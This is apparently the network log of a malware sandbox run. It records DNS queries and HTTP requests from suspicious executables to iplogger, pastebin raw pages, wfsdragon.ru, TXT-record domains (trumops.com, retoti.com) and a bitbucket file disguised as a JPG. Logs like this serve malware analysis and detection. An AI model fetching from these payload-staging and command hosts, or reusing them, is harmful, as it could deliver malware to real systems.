                  Set-Cookie: clhf03028ja=138.199.29.44; expires=Thu, 06 Nov 2025 10:41:18 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                  memory: 0.45774078369140625
                  expires: Wed, 06 Nov 2024 10:41:18 +0000
                  Cache-Control: no-store, no-cache, must-revalidate
                  strict-transport-security: max-age=31536000
                  x-frame-options: SAMEORIGIN
                  cf-cache-status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mEzE2mzDX73rszOg%2FTUwLLJBUBPXZcDryPhrBP1sF%2BfV27DlaKTco0Kxgdt8yUhXaXUBL6VxaGrWmVCdL%2B%2FKXLP6yLxRRm7s7zrGIQzsU1rsUY%2BGSE8KD1EQSovjQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8de4786bccfd730c-LHR
                  server-timing: cfL4;desc="?proto=TCP&rtt=42225&sent=7&recv=7&lost=0&retrans=1&sent_bytes=2890&recv_bytes=396&delivery_rate=88033&cwnd=254&unsent_bytes=0&cid=3b6d05f90e88d80e&ts=581&x=0"
                • flag-us
                  GET
                  https://iplogger.org/1Bthn7
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  104.26.3.46:443
                  Request
                  GET /1Bthn7 HTTP/1.1
                  Host: iplogger.org
                  Response
                  HTTP/1.1 403 Forbidden
                  Date: Wed, 06 Nov 2024 10:41:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Resource-Policy: same-origin
                  Origin-Agent-Cluster: ?1
                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                  Referrer-Policy: same-origin
                  X-Content-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  cf-mitigated: challenge
                  cf-chl-out: 90oXSqZiE3Jj2LTfjGVdHcAmDzR69zf5CP8ARVzfgYdBmi0RHj0pfyje7DPqmKesVLsNaw6NwOL4oPaYkjBtDassMoDOqi4y52VGyiAT10xIsZcqE78E7or8cg+DmUvRTiIYn51xLSl7RT/uGj9JDA==$5sFHPuD+zh58H+qAgiJ5aw==
                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWA4%2B%2BSuzitoygbMMcb8%2BMa1CeAPY9Ov%2FJNTZRG0gd%2By1ZIHlCAQATRkEV9nU2FMkQRK1WAPeNyV4%2F3XeNcyI4eOPPgu5u064RzT96fgCVXb8%2FLFBZt12YEPM3ktWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8de47871aec07780-LHR
                  server-timing: cfL4;desc="?proto=TCP&rtt=43793&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=385&delivery_rate=89311&cwnd=253&unsent_bytes=0&cid=679dbbb1669ae07a&ts=110&x=0"
                • flag-us
                  DNS
                  c.pki.goog
                  Mon1631358b82299bd8.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  c.pki.goog
                  IN A
                  Response
                  c.pki.goog
                  IN CNAME
                  pki-goog.l.google.com
                  pki-goog.l.google.com
                  IN A
                  142.250.187.227
                • flag-gb
                  GET
                  http://c.pki.goog/r/gsr1.crl
                  Mon1631358b82299bd8.exe
                  Remote address:
                  142.250.187.227:80
                  Request
                  GET /r/gsr1.crl HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Microsoft-CryptoAPI/6.1
                  Host: c.pki.goog
                  Response
                  HTTP/1.1 200 OK
                  Accept-Ranges: bytes
                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                  Cross-Origin-Resource-Policy: cross-origin
                  Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                  Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                  Content-Length: 1739
                  X-Content-Type-Options: nosniff
                  Server: sffe
                  X-XSS-Protection: 0
                  Date: Wed, 06 Nov 2024 10:24:28 GMT
                  Expires: Wed, 06 Nov 2024 11:14:28 GMT
                  Cache-Control: public, max-age=3000
                  Age: 1011
                  Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
                  Content-Type: application/pkix-crl
                  Vary: Accept-Encoding
                • flag-gb
                  GET
                  http://c.pki.goog/r/r4.crl
                  Mon1631358b82299bd8.exe
                  Remote address:
                  142.250.187.227:80
                  Request
                  GET /r/r4.crl HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Microsoft-CryptoAPI/6.1
                  Host: c.pki.goog
                  Response
                  HTTP/1.1 200 OK
                  Accept-Ranges: bytes
                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                  Cross-Origin-Resource-Policy: cross-origin
                  Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                  Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                  Content-Length: 436
                  X-Content-Type-Options: nosniff
                  Server: sffe
                  X-XSS-Protection: 0
                  Date: Wed, 06 Nov 2024 10:24:28 GMT
                  Expires: Wed, 06 Nov 2024 11:14:28 GMT
                  Cache-Control: public, max-age=3000
                  Age: 1012
                  Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                  Content-Type: application/pkix-crl
                  Vary: Accept-Encoding
                • flag-us
                  DNS
                  pastebin.com
                  Mon166dc6040fb8726.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  pastebin.com
                  IN A
                  Response
                  pastebin.com
                  IN A
                  172.67.19.24
                  pastebin.com
                  IN A
                  104.20.4.235
                  pastebin.com
                  IN A
                  104.20.3.235
                • flag-us
                  GET
                  https://pastebin.com/raw/A7dSG1te
                  Mon166dc6040fb8726.exe
                  Remote address:
                  172.67.19.24:443
                  Request
                  GET /raw/A7dSG1te HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: ???�ll
                  Host: pastebin.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  x-frame-options: DENY
                  x-frame-options: DENY
                  x-content-type-options: nosniff
                  x-content-type-options: nosniff
                  x-xss-protection: 1;mode=block
                  x-xss-protection: 1;mode=block
                  cache-control: public, max-age=1801
                  CF-Cache-Status: HIT
                  Age: 60
                  Server: cloudflare
                  CF-RAY: 8de478c40c6363b6-LHR
                • flag-us
                  DNS
                  wfsdragon.ru
                  Mon166dc6040fb8726.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  wfsdragon.ru
                  IN A
                  Response
                  wfsdragon.ru
                  IN A
                  104.21.5.208
                  wfsdragon.ru
                  IN A
                  172.67.133.215
                • flag-us
                  GET
                  http://wfsdragon.ru/api/setStats.php
                  Mon166dc6040fb8726.exe
                  Remote address:
                  104.21.5.208:80
                  Request
                  GET /api/setStats.php HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: ????ll
                  Host: wfsdragon.ru
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:33 GMT
                  Content-Type: text/html; charset=iso-8859-1
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  cf-cache-status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLIDpX2WJwWkO0vTSXNUcVNjZf2Dlm7i56ESe8%2BH7nyPjT0VYKlkET5eFQRkNpVU%2FctQ9Gej27noxYWN7zk%2BU3DeCp3uqbLQQ4mdDaFoy8%2BGgVoTb7HtaWEWiQ%2Bwi4k%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8de478c59e6260fa-LHR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=41380&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=98&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                • flag-us
                  DNS
                  www.google.com
                  powershell.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.google.com
                  IN A
                  Response
                  www.google.com
                  IN A
                  142.250.180.4
                • flag-us
                  DNS
                  crl.microsoft.com
                  Remote address:
                  8.8.8.8:53
                  Request
                  crl.microsoft.com
                  IN A
                  Response
                  crl.microsoft.com
                  IN CNAME
                  crl.www.ms.akadns.net
                  crl.www.ms.akadns.net
                  IN CNAME
                  a1363.dscg.akamai.net
                  a1363.dscg.akamai.net
                  IN A
                  2.19.117.18
                  a1363.dscg.akamai.net
                  IN A
                  2.19.117.22
                • flag-gb
                  GET
                  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
                  Remote address:
                  2.19.117.18:80
                  Request
                  GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
                  User-Agent: Microsoft-CryptoAPI/6.1
                  Host: crl.microsoft.com
                  Response
                  HTTP/1.1 200 OK
                  Content-Length: 1036
                  Content-Type: application/octet-stream
                  Content-MD5: 8M9bF5Tsp81z+cAg2quO8g==
                  Last-Modified: Thu, 26 Sep 2024 02:21:11 GMT
                  ETag: 0x8DCDDD1E3AF2C76
                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                  x-ms-request-id: b28c4ea1-d01e-0016-0ebc-0fa13d000000
                  x-ms-version: 2009-09-19
                  x-ms-lease-status: unlocked
                  x-ms-blob-type: BlockBlob
                  Date: Wed, 06 Nov 2024 10:41:56 GMT
                  Connection: keep-alive
                • flag-us
                  DNS
                  trumops.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  trumops.com
                  IN TXT
                  Response
                  trumops.com
                  IN TXT
                  .v=spf1 include:_incspfcheck.mailspike.net ?all
                • flag-us
                  DNS
                  retoti.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  retoti.com
                  IN TXT
                  Response
                  retoti.com
                  IN TXT
                  .v=spf1 include:_incspfcheck.mailspike.net ?all
                • flag-us
                  DNS
                  logs.trumops.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  logs.trumops.com
                  IN TXT
                  Response
                • flag-us
                  DNS
                  logs.retoti.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  logs.retoti.com
                  IN TXT
                  Response
                • flag-us
                  DNS
                  www.yahoo.com
                  powershell.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.yahoo.com
                  IN A
                  Response
                  www.yahoo.com
                  IN CNAME
                  me-ycpi-cf-www.g06.yahoodns.net
                  me-ycpi-cf-www.g06.yahoodns.net
                  IN A
                  87.248.114.12
                  me-ycpi-cf-www.g06.yahoodns.net
                  IN A
                  87.248.114.11
                • flag-us
                  DNS
                  f5b086b2-fc5a-46c5-b748-f39ef0e7356e.uuid.trumops.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  f5b086b2-fc5a-46c5-b748-f39ef0e7356e.uuid.trumops.com
                  IN TXT
                  Response
                • flag-us
                  DNS
                  server14.trumops.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  server14.trumops.com
                  IN A
                  Response
                  server14.trumops.com
                  IN A
                  44.221.84.105
                • flag-us
                  DNS
                  msdl.microsoft.com
                  patch.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  msdl.microsoft.com
                  IN A
                  Response
                  msdl.microsoft.com
                  IN CNAME
                  msdl.microsoft.akadns.net
                  msdl.microsoft.akadns.net
                  IN CNAME
                  msdl-microsoft-com.a-0016.a-msedge.net
                  msdl-microsoft-com.a-0016.a-msedge.net
                  IN CNAME
                  a-0016.a-msedge.net
                  a-0016.a-msedge.net
                  IN A
                  204.79.197.219
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/index2.txt
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/index2.txt HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 404 Not Found
                  X-Cache: TCP_HIT
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: 1DC4353062F7453CB028BAD849D4344E Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:00Z
                  Date: Wed, 06 Nov 2024 10:41:59 GMT
                  Content-Length: 0
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 302 Found
                  Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  X-Cache: TCP_MISS
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: FDFBB4E66FE14AF5AC3FAEA522DFECB5 Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:00Z
                  Date: Wed, 06 Nov 2024 10:41:59 GMT
                  Content-Length: 0
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 302 Found
                  Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  X-Cache: TCP_HIT
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: 9CFAB48C05DE48F8B62471B7157CF200 Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:08Z
                  Date: Wed, 06 Nov 2024 10:42:07 GMT
                  Content-Length: 0
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/index2.txt
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/index2.txt HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 404 Not Found
                  X-Cache: TCP_HIT
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: CDCED4E2521F47F38884798124758379 Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:19Z
                  Date: Wed, 06 Nov 2024 10:42:18 GMT
                  Content-Length: 0
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 302 Found
                  Location: https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  X-Cache: TCP_MISS
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: CACAB976BC9B40BA899028519C519746 Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:19Z
                  Date: Wed, 06 Nov 2024 10:42:19 GMT
                  Content-Length: 0
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 302 Found
                  Location: https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  X-Cache: TCP_HIT
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: 82588757DD5648AEA74E2F2FF8BFC661 Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:22Z
                  Date: Wed, 06 Nov 2024 10:42:21 GMT
                  Content-Length: 0
                • flag-us
                  DNS
                  www.microsoft.com
                  patch.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.microsoft.com
                  IN A
                  Response
                  www.microsoft.com
                  IN CNAME
                  www.microsoft.com-c-3.edgekey.net
                  www.microsoft.com-c-3.edgekey.net
                  IN CNAME
                  www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                  www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                  IN CNAME
                  e13678.dscb.akamaiedge.net
                  e13678.dscb.akamaiedge.net
                  IN A
                  23.192.22.93
                • flag-us
                  DNS
                  vsblobprodscussu5shard30.blob.core.windows.net
                  patch.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  vsblobprodscussu5shard30.blob.core.windows.net
                  IN A
                  Response
                  vsblobprodscussu5shard30.blob.core.windows.net
                  IN CNAME
                  blob.sat09prdstrz08a.store.core.windows.net
                  blob.sat09prdstrz08a.store.core.windows.net
                  IN CNAME
                  blob.sat09prdstrz08a.trafficmanager.net
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.38.228
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.79.68
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.70.36
                • flag-us
                  GET
                  https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  patch.exe
                  Remote address:
                  20.150.38.228:443
                  Request
                  GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26 HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: vsblobprodscussu5shard30.blob.core.windows.net
                  Response
                  HTTP/1.1 200 OK
                  Content-Length: 8752128
                  Content-Type: application/octet-stream
                  Content-Language: x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
                  Accept-Ranges: bytes
                  ETag: "0x8D4B1DACA398C54"
                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                  x-ms-request-id: fba9d5e3-401e-0056-7e38-30a7e7000000
                  x-ms-version: 2019-07-07
                  x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
                  x-ms-lease-status: unlocked
                  x-ms-lease-state: available
                  x-ms-blob-type: BlockBlob
                  x-ms-server-encrypted: true
                  Access-Control-Expose-Headers: Content-Length
                  Access-Control-Allow-Origin: *
                  Date: Wed, 06 Nov 2024 10:42:01 GMT
                • flag-us
                  GET
                  https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  patch.exe
                  Remote address:
                  20.150.38.228:443
                  Request
                  GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26 HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: vsblobprodscussu5shard30.blob.core.windows.net
                  Response
                  HTTP/1.1 200 OK
                  Content-Length: 8752128
                  Content-Type: application/octet-stream
                  Content-Language: x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
                  Accept-Ranges: bytes
                  ETag: "0x8D4B1DACA398C54"
                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                  x-ms-request-id: fba9f421-401e-0056-2138-30a7e7000000
                  x-ms-version: 2019-07-07
                  x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
                  x-ms-lease-status: unlocked
                  x-ms-lease-state: available
                  x-ms-blob-type: BlockBlob
                  x-ms-server-encrypted: true
                  Access-Control-Expose-Headers: Content-Length
                  Access-Control-Allow-Origin: *
                  Date: Wed, 06 Nov 2024 10:42:08 GMT
                • flag-us
                  DNS
                  bitbucket.org
                  Build.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  bitbucket.org
                  IN A
                  Response
                  bitbucket.org
                  IN A
                  185.166.142.21
                  bitbucket.org
                  IN A
                  185.166.142.23
                  bitbucket.org
                  IN A
                  185.166.142.22
                • flag-ie
                  GET
                  https://bitbucket.org/chege3/softwarellc/downloads/SFS.jpg
                  Build.exe
                  Remote address:
                  185.166.142.21:443
                  Request
                  GET /chege3/softwarellc/downloads/SFS.jpg HTTP/1.1
                  Host: bitbucket.org
                  Connection: Keep-Alive
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:03 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 15670
                  Server: AtlassianEdge
                  Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
                  X-Used-Mesh: False
                  Content-Language: en
                  X-View-Name: bitbucket.apps.downloads.views.download_file
                  Etag: "7965ca4bf1b49d08360f9bfa95f7ea01"
                  X-Dc-Location: Micros-3
                  X-Served-By: bafa1b132f65
                  X-Version: 0470f756d362
                  X-Static-Version: 0470f756d362
                  X-Request-Count: 986
                  X-Render-Time: 0.1053321361541748
                  X-B3-Traceid: 142c728889704105b282c1636ca046de
                  X-B3-Spanid: 582c46a1455cb22f
                  X-Frame-Options: SAMEORIGIN
